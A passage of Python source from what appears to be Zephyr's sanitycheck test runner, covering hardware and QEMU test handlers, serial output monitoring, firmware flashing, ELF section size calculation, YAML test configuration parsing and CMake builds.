except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(serial_pty, stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
#sometimes QEMU can't handle SIGTERM signal correctly
#in that case kill -9 QEMU process directly and leave
#sanitycheck judge testing result by console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {self.returncode}")
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if self.returncode != 0 or not harness.state:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
